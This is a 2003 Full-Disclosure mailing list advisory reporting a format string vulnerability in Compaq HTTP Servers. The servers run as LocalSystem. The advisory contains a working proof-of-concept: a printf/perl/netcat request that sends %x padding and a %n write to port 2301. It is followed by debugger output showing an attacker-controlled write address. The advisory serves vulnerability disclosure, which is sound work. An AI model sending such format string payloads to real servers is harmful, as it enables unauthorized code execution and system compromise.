[Full-Disclosure] formatstring bug in Compaq HTTP Servers

Type securityvulns
Reporter Securityvulns
Modified 2003-08-04T00:00:00


Hi there

There is a formatstring bug in Compaq HTTP Servers. [in <!.DebugSearchPaths>?Url=> requests]

The HTTP server runs with LocalSystem account.

Versions: All versions i have tested had this formatstring bug.

To be shure that it wasn't allready fixed, i downloaded this new version.. Insight Management Agent
Version: 5.00 H (01/17/2003) http://www29.compaq.com/falco/sp_detail.asp?Model=4214&Div=2&Os=93&SoftwareVer=17022

Request: $ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 2301

Result: 0:005> g (9a8.934): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=42424242 ebx=0000006e ecx=000012eb edx=00000200 esi=00b440c0 edi=00000800 eip=780127a8 esp=010287f8 ebp=01028a50 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246 MSVCRT!setvbuf+65d: 780127a8 8908 mov [eax],ecx ds:0023:42424242=???????? WARNING: Unable to verify checksum for C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1\CpqHMMO.dll ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\Compaq \COMPAQ~1\CPQWEB~1\CpqHMMO.dll -

Have a nice day /bashis

Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html